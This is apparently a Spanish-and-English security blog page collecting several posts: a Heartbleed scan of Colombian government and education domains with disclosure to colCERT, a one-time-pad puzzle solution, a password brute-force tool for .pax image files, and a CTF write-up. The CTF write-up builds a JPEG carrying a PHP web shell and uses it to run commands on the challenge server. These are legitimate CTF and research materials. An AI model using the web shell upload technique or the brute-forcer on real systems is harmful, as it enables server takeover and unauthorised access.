Contenido principal

Overview of OpenSSL security bug (CVE-2014-0160) on critical Colombian domain names

Abril 10, 2014

* Update on methodology and results: Statistical sample
* Update on methodology and results: Retest

The TLS heartbeat read overrun (CVE-2014-0160) (also known as The Heartbleed Bug) is the hot topic right now on the information security field. While this publication is not about the technical detail of the bug but some statistics of critical affected Colombian domains, I will show you a big picture of the vulnerability and the results of my research.

If you would like to know more about it, please take a look at the following resources: The Heartbleed Bug, Sean Cassidy's technical analysis, Robert Erbes' technical analysis.

Vulnerability summary

The Heartbleed Bug allows an attacker to read sensitive information contained in the memory of the process which depends on the OpenSSL implementation (OpenSSL from version 1.0.1 to 1.0.1f).

Sensitive information such as user credentials, session IDs, data sent to the server and received by the client, private keys, and anything you can imagine could be found by exploiting this vulnerability.

Affected users are recommended to fix the issue as soon as possible by updating to the latest version of OpenSSL (1.0.1g).

Methodology and results

Restricted Colombian domain names

Using domain name searching methods I was able to get a long-enough list of third-level domains (the list does not include subdomains) which are classified by NIC.CO as restricted user domains, this is, the person who register the domain have to meet certain legal requirements to be able to get a restricted domain name (gov.co, edu.co, mil.co, and org.co).

These domains are used by Colombian government agencies or institutions, Colombian educational sector institutions recognized by the Ministry of National Education, Agencies or institutions of the Colombian Armed Forces, and Companies or nonprofit institutions resident in Colombia.

Update note about the statistical sample

Through this methodology, a sample of 2612 domain names were found which is a 99% representative sample for a hypothetical case of 10000 (*) valid and functional domain names.
* Approximate data provided by NIC.CO

Evaluation date

Start time: 08/04/2014 - 22:48
Finish time: 08/04/2014 - 23:30

Identifying vulnerable domains

A modified version of the Jared Stafford's python script was used to identify in a non-intrusive way the affected domains (no data was stored or viewed on the test, the script just only show the status of the server).

    for domain in domains:
        result = ''
        ip = domain_exists(domain)
        if ip != False:
            if check_connectivity(domain):
                try:
                    if check_heartbleed(domain):
                        result = 'VULNERABLE'
                    else:
                        result = 'NOT-VULNERABLE'
                except Exception:
                    result = 'SECURE-CHANNEL-UNSUPPORTED'
            else:
                result = 'SECURE-CHANNEL-UNSUPPORTED'
        else:
            result = 'NON-EXISTENT'

Results

2612 restricted domain names were tested against the vulnerability (perhaps this is not the total number of valid domain names). There are 1592 domains that are not vulnerable and 252 that are (a total of 1844 domains with HTTPS support distributed on 985 different IPs, and 768 not applicable):



This is the detail of the results classified by each Third-level domain:

:arrow: gov.co, 602 not vulnerable (51.99%), 70 vulnerable (6.04%), 486 not applicable (41.97%).
:arrow: edu.co, 639 not vulnerable (68.34%), 104 vulnerable (11.12%), 192 not applicable (20.53%).
:arrow: mil.co, 17 not vulnerable (25.76%), 42 vulnerable (63.64%), 7 not applicable (10.61%).
:arrow: org.co, 334 not vulnerable (73.73%), 36 vulnerable (7.95%), 83 not applicable (18.32%).



Finally, we got the distribution of the vulnerable Colombian third-level domains:



Retest

One month later 252 domains have been tested against the vulnerability, the results are shown:

:arrow: 228 (90.48%) domains do not have the bug anymore.
:arrow: 5 (1.98%) domains turn off their HTTPS support.
:arrow: 6 (2.38%) domains do not have an A record associated on the DNS.
:arrow: 18 (7.14%) domains on 16 IPs are still vulnerable.

Comparison of vulnerable domains one month later:


Final overview of the OpenSSL security bug on Colombian third-level domain names:


Incident handling

:arrow: 08/04/2014 - Start of the security test.
:arrow: 09/04/2014 - colCERT was contacted to coordinate the incident handling and communicate the issue to the affected domains.
:arrow: 10/04/2014 - First contact with colCERT (list of 252 affected domain names was provided), they are taking now all necessary steps to solve the issue on the affected domains.
:arrow: 11/04/2014 - First contact with NIC.CO, they are working together with colCERT to solve the issue on all the affected domains.
:arrow: 08/05/2014 - Start of the security retest.
:arrow: 10/05/2014 - Final update.

Archivado en: Seguridad | Comentarios (1)

Campus Party Colombia 2013

Octubre 13, 2013

Esta semana, del 7 al 13 de Octubre, se llevó a cabo la sexta edición de Campus Party Colombia en la ciudad de Medellín. En el área de seguridad se encontraba la propuesta de la competencia para este año, en total fueron 30 retos, de los cuales se solucionaron 23.

En el siguiente enlace puede encontrar la solución para cada uno de lo 23 retos resueltos:

:arrow: Solución retos de seguridad Campus Party Colombia 2013

En el sitio principal de NULL Life puede encontrar solucionarios a otros eventos organizados a nivel nacional e internacional.

El tablero "final" de puntuación es el siguiente:
Scoreboard Campus Party Colombia 2013

Tanto en el juego presencial como en la gráfica se puede evidenciar el juego no limpio, la gráfica con los valores reales queda a consideración de los organizadores.

Debido a esto, y a otros sucesos, el equipo NULL Life, anuncia públicamente que no volverá a participar en este tipo de eventos, a menos que reglas claras y concisas sean establecidas antes del juego, y estas se respeten.

Archivado en: Criptografía, Ingeniería Inversa, Retos informáticos, Seguridad | Comentarios (0)

One-time pad challenge

Julio 13, 2013

El día 7 de Marzo de 2013 publiqué en el grupo de Sinfocol en Facebook un mini reto relacionado con el cifrado One-time pad, cuyo funcionamiento constituye el esquema perfecto de cifrado si es usado correctamente:

Los tres ganadores fueron:
1. Everth Gallegos (PerverthsO)
2. Manuel Suárez (Blackubay)
3. Juan Escobar

La descripción del reto todavía se encuentra en el grupo:



El contenido del archivo dota2.txt es el siguiente:

ekFAEUFdTRFQU05RFV9VWEEeE3oTW1VcGFhSF3BHXVdYRR4UWEMXXVJTRl5eXhNC
UVwZRklQUldRU0UZWVEWX04XU1dTQkVTQUMfFXoVV1ZbV1tBF0VWVF4KF1pARhV4
Fl1aXUAURl9VQhZHUVRQQRJAVUFDQFhKW0ddEUBbQ1dGGVdaX1ZDQBNYVlZcEF1W
E1JdS1JXQhBCUVoWehBAUksRHhJAR1teEkBYRxNAUVUXU1VUVlBMElZeGERfUF4K
GVRcURFJVE0QRVlQThNQUkJUGF9YQVRbSRJCRVtbXVcRVRlOXEZcGFtXFkNHRU1a
GhR1Q0UUW1FYTxhRSxJGXlFRQhBXV1RHUl9bXlVLFURSRlcfFEFcUUBRE0BQQxda
XVwQWFEXQFxcVBJHXlBWXRFGRVtDUxFZXllMVVISW1QIExwTcRRYXVJeEEdfUFwQ
QFxcShNMXVpRFkldTBdCXxZVVhdEQVxcEElYRUsTVU1WQl0dElZaUBNZW0MQQFgS
X1VCGU9WQkVBVVVFVEMRVlQWXVdbVl9OVF0QUEwVRV1UEF5ZR1RRFlxRF19IEVRe
WkNGXVdUXRoUZl1VTBZWQFReTRZDWBBfWUNRFFtcU1cZV0RRVVtdUhRbUxRKUUxQ
VlAZR1lfQBoYWlxRUkVDXBhDUVZIEkBSQVMRRE1AVBVAXRRbXBlWV01QVEJWURFV
SxJBX1dcFlhLGXwRVkNTWF1UE15IGF5cQksYV1dXGVxdSkZYV0xUVBVVSxBdVl9b
UFBdXFpNAxhDUVZKElNWREZUWVdYTRNVWFMTUUFCVllDGUNfFlpREVteR0QTSl9R
XFxUVkRFF1BdEkNXQVpcXxJHX19HGhRNXlhXSkYTU0gYRFpWEl5YSlFQEFZeEVxY
WkRNVFtQVRFDXVNOEVpWV18TR1pVFl9XQ1JXFV9fGUJDTUVQAxFTVkEQQFlTVxB6
FVVaGVFWXF1QVRlSUFhRRBdGX1JMFn8XUlUVXVVbQ0ddWU0cEnpBTRlRVxJYV0EY
VFxeVFBFUVdGF1gWRlFNGFJDVlUUQFxWX0FHFw==

Las pistas proporcionadas durante el transcurso de cada día en la semana fueron:
:arrow: Base64.
:arrow: Esquema de cifrado perfecto, indestructible, inquebrantable, inmejorable, irrompible, etc... en ciertos casos, cuando es usado de forma correcta.
:arrow: La primera palabra del texto plano es: "How".
:arrow: La última pista es: Número E!
:arrow: Texto plano = b64.decode(dota2.txt) ^ Número E

La última verdadera pista contenía la forma de resolver el acertijo, acertijo que puede ser encontrado en forma de código fuente (Gracias a Juan Escobar por permitirme publicar su código):

# Reto Sinfocol
# https://www.facebook.com/groups/107415515957353/422375584461343/
# Juan M. Escobar T. @itsecurityco

import base64

ciphertext = base64.b64decode("ekFAEUFdTRFQU05RFV9VWEEeE3oTW1VcGFhSF3BHXVdYRR4UWEMXXVJTRl5eXhNCUVwZRklQUldRU0UZWVEWX04XU1dTQkVTQUMfFXoVV1ZbV1tBF0VWVF4KF1pARhV4Fl1aXUAURl9VQhZHUVRQQRJAVUFDQFhKW0ddEUBbQ1dGGVdaX1ZDQBNYVlZcEF1WE1JdS1JXQhBCUVoWehBAUksRHhJAR1teEkBYRxNAUVUXU1VUVlBMElZeGERfUF4KGVRcURFJVE0QRVlQThNQUkJUGF9YQVRbSRJCRVtbXVcRVRlOXEZcGFtXFkNHRU1aGhR1Q0UUW1FYTxhRSxJGXlFRQhBXV1RHUl9bXlVLFURSRlcfFEFcUUBRE0BQQxdaXVwQWFEXQFxcVBJHXlBWXRFGRVtDUxFZXllMVVISW1QIExwTcRRYXVJeEEdfUFwQQFxcShNMXVpRFkldTBdCXxZVVhdEQVxcEElYRUsTVU1WQl0dElZaUBNZW0MQQFgSX1VCGU9WQkVBVVVFVEMRVlQWXVdbVl9OVF0QUEwVRV1UEF5ZR1RRFlxRF19IEVReWkNGXVdUXRoUZl1VTBZWQFReTRZDWBBfWUNRFFtcU1cZV0RRVVtdUhRbUxRKUUxQVlAZR1lfQBoYWlxRUkVDXBhDUVZIEkBSQVMRRE1AVBVAXRRbXBlWV01QVEJWURFVSxJBX1dcFlhLGXwRVkNTWF1UE15IGF5cQksYV1dXGVxdSkZYV0xUVBVVSxBdVl9bUFBdXFpNAxhDUVZKElNWREZUWVdYTRNVWFMTUUFCVllDGUNfFlpREVteR0QTSl9RXFxUVkRFF1BdEkNXQVpcXxJHX19HGhRNXlhXSkYTU0gYRFpWEl5YSlFQEFZeEVxYWkRNVFtQVRFDXVNOEVpWV18TR1pVFl9XQ1JXFV9fGUJDTUVQAxFTVkEQQFlTVxB6FVVaGVFWXF1QVRlSUFhRRBdGX1JMFn8XUlUVXVVbQ0ddWU0cEnpBTRlRVxJYV0EYVFxeVFBFUVdGF1gWRlFNGFJDVlUUQFxWX0FHFw==");

key = "2.7182818284590452353602874713526624977572470936999595749669676277240766303535475945713821785251664274274663919320030599218174135966290435729003342952605956307381323286279434907632338298807531952510190115738341879307021540891499348841675092447614606680822648001684774118537423454424371075390777449920695517027618386062613313845830007520449338265602976067371132007093287091274437470472306969772093101416928368190255151086574637721112523897844250569536967707854499699679468644549059879316368892300987931277361782154249992295763514822082698951936680331825288693984964651058209392398294887933203625094431173012381970684161403970198376793206832823764648042953118023287825098194558153017567173613320698112509961818815930416903515988885193458072738667385894228792284998920868058257492796104841984443634632449684875602336248270419786232090021609902353043699418491463140934317381436405462531520961836908887070167683964243781405927145635490613031072085103837505101157477041718986106873969655212671546889570350354";
# http://www.greatplay.net/uselessia/articles/e2-1000.html

plaintext = ''
for i in range(0,len(ciphertext)):
    plaintext += unichr(ord(ciphertext[i]) ^ ord(key[i]))

print plaintext

El texto plano es el siguiente:

How you have felt, O men of Athens, at hearing the speeches of my accusers, I cannot tell; but I know that their persuasive words almost made me forget who I was - such was the effect of them; and yet they have hardly spoken a word of truth. But many as their falsehoods were, there was one of them which quite amazed me; - I mean when they told you to be upon your guard, and not to let yourselves be deceived by the force of my eloquence. They ought to have been ashamed of saying this, because they were sure to be detected as soon as I opened my lips and displayed my deficiency; they certainly did appear to be most shameless in saying this, unless by the force of eloquence they mean the force of truth; for then I do indeed admit that I am eloquent. But in how different a way from theirs!

Felicitaciones a los ganadores!

Archivado en: Criptografía, Retos informáticos | Comentarios (2)

PAXCracker: Pick Ax secure image browser bruteforce tool

Abril 10, 2013

Finally I got some time to develop a random tool, this time is a wordlist-based bruteforce tool intended to obtain the password of .pax files (Pick Ax image browser). At the moment, PAXCracker is not a sophisticated tool for bruteforcing, but instead it is a simple wordlist iterator that try to read the contents of .pax files by using ImgSource library (_ISource50.dll).

This is a screenshot of the tool guessing a password:

The magic is in this piece of code (is5_ReadPAX takes care of the "dirty work"):

  _is5_Seek(paxFile, 0,0);
  result = _is5_ReadPAX(paxFile, &width, &height, 24, 0, password, 0);

  if (result != 0) {
   cracked = 1;
   break;
  }

You can find the whole source code in the PAXCracker GitHub Project.

You can find too the tool compiled on Windows XP x86, you should download ImgSource DLL from the original source, and copy the library to the same directory of PAXCracker.

Archivado en: Programación, Seguridad | Comentarios (1)

Imafreak - ForbiddenBITS 2013

Marzo 17, 2013

For this challenge, we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~), there, we can upload and see JPEG images:

By following the hint, we can get the source code of view.php script (Using ~ to retrieve the content of the temporal file: http://192.73.237.131/view.php~).

Wild vulnerability appears in these lines:

        $filex="secretstoreddata/".md5(rand(0,100)).($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);

We can control $camModel variable by modifying EXIF data on the image, and $dd variable by making a JPEG that contains a shellcode in the red channel. The objetive here is to create a PHP script (camModel = .php) with custom shellcode:

<?php
// shellcode
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);

// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}

// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);

// add Model metadata using exiv2 tool
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');

The result of the script is this image (Right click, save target as, for better understanding):

By uploading the JPEG, we can execute commands on the server:

:arrow: List files in root folder
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../

total 344
7999660 drwxr-xr-x 9 root root   4096 Mar 16 13:46 .
7999659 drwxr-xr-x 6 root root   4096 Feb 15 15:35 ..
8000136 -rw-r--r-- 1 root root    164 Mar 14 21:01 confirmed.txt
7999914 drwxr-xr-x 2 root root   4096 Mar 16 07:29 css
7999917 drwxr-xr-x 6 root root   4096 Mar 16 07:30 css_pirobox
8000029 drwxr-xr-x 2 root root   4096 Mar 16 07:31 images
8000137 -rw-r--r-- 1 root root   2588 Mar 16 07:51 index.php
8000057 drwxr-xr-x 2 root root   4096 Mar 16 07:31 js
8000138 -rw-r--r-- 1 root root    741 Dec 28  2010 piecemaker.css
8000139 -rw-r--r-- 1 root root     39 Mar 14 21:13 robots.txt
8000123 drwxrwxrwx 2 root root  49152 Mar 17 23:52 secretstoreddata
8000140 -rw-r--r-- 1 root root     57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php
8000141 -rw-r--r-- 1 root root   8153 Apr  4  2011 templatemo_style.css
8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload
8000142 -rw-r--r-- 1 root root   3203 Mar 16 13:45 upload.php
8000143 -rw-r--r-- 1 root root   3464 Mar 16 12:02 view.php
8000144 -rw-r--r-- 1 root root   3589 Mar 16 12:02 view.php~
8000134 drwxr-xr-x 2 root root   4096 Mar 16 07:32 wehatebatman

:arrow: Read first flag
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php

<?php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>

Unfortunately, we were unable to get the second flag, but after the competition, Phiber from Activalink, pointed us to the second flag, it was the first JPEG image uploaded using the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):

Archivado en: Retos informáticos, Seguridad | Comentarios (1)